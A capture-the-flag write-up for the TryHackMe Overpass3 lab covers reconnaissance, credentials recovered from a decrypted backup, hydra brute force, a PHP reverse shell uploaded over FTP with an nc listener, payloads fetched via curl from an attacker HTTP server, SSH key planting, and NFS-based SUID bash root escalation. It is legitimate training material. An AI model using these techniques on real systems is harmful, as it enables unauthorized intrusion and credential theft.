search
Buy me a tea

TryHackMe - Overpass3

hashtag
Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.4.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 17:50 EDT
Stats: 0:04:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.32% done; ETC: 17:55 (0:00:20 remaining)
Nmap scan report for 10.10.4.129
Host is up (0.21s latency).
Not shown: 65235 filtered tcp ports (no-response), 297 filtered tcp ports (admin-prohibited)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
|_http-title: Overpass Hosting
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 5.4 (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 317.52 seconds

hashtag
Gobuster

If we go to the website there is nothing specific that is visible so we can run a gobuster to check for hidden directories

There is a backups page, in there we can find a backup.zip file. The zip is easily extracted (not password protected). In it we find:

  • A PGP private key

  • An excel file CUstomerDetails.xlsx.gpg

hashtag
Decrypt the xlsx

  • According to this docarrow-up-right it can be decrypted in one command but first we need to import the private key with pgp --import priv.key

  • And then we can decrypt the file:

  • Once decrypted the file can be opened with libre office (if you do not have Microsoft Excel like me ;) )

  • And we get this

So we have usernames and passwords:

  • paradox ShibesAreGreat123

  • 0day OllieIsTheBestDog

  • muirlandoracle A11D0gsAreAw3s0me

We can put them both in separate files for later use

hashtag
FTP

  • Let's see if we can use those to connect through ftp. (note: I tried with ssh but password authentication is not supported)

  • Using hydra we have a hit!

  • So we can connext to the ftp using the creds paradox:ShibesAreGreat123

  • It seems like this the ftp used to serve the website. We have write permission so we can try to get rce this way.

  • As it is apache we can try to use a php reverse shell. Lets take the one from pentestmonkeyarrow-up-right

  • We modify the IP address and port as we wish

  • we set up our listener rlwrap nc -lvp 1234 (rlwrap will allow us to have a more interactive shell which is pretty convenient)

  • We put ou reverse shell on the ftp

  • And now we can navigate to our shell using our browser http://10.10.4.129/php-reverse-shell.php

  • We get a shell!!

  • Let's use the command find to find a flag find / -name *flag* 2>/dev/null There is one here: /usr/share/httpd/web.flag

  • We have the web flag

  • We could try the passwords we got previously with the su command

  • Let's try with james we get failure with all three pass. Lets try with paradox, it works with the password ShibesAreGreat123

  • If we ls -al the home directory we have an authorized key for paradox so we could replace it with our public key to have a more stable shell. Lets generate an rsa_key

  • Now we just need to replace the authorized_keys fil with our public key. First we copy our private key in an authorized_keys file cp private.pub authorized_keys

  • Then we laucn an http server python3 -m http.server 80

  • wget does not work in our target so we can use curl instead curl http://10.13.22.56/authorized_keys --output authorized_keys

  • And now the authorized keys is our public key

  • Now we can just connect this way ssh -i private paradox@10.10.4.129

  • Let's get linpeasarrow-up-right on the machine to enumerate our way to root.

  • We get linpeas in our machine wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64

  • We launch python http server python3 -m http.server 80

  • We get it in our target using curl curl http://10.13.22.56/linpeas_linux_amd64 --output linpeas

  • We make it executable chmod +x linpeas

  • we launch it ./linpeas

  • There is a recent CVE cve-2021-4034

  • But there is also this that seems interesting as linpeas highlight as a 95% PE vector

  • we could try to port forward ssh paradox@10.10.4.129 -i private -L 2049:localhost:2049 and then mount the share

  • We now have access to the user flag and we also have the .ssh folder of james so we can use it to login as james

  • It works

  • Let's try to go further with the nfs misconfiguration

  • For our attacking machine we run

  • From our shell as jams we can now run

  • So we get this error we probably need another bash binary let's try with the one from the target machine.

  • We copy it using scp to our attacking machine scp -i .ssh/id_rsa james@10.10.4.129:/bin/bash .

  • Let's redo our chomd +s chmod +s bash

  • We just need to ./bash -p and it works!

(in fact I accidentally type ./bash at first but then retyping ./bash -p did the trick.

  • we can get the root flag bash-4.4# cat /root/root.flag

PreviousTryHackMe - NahamstoreNextTryHackMe - OWASP Top 10 2021

Last updated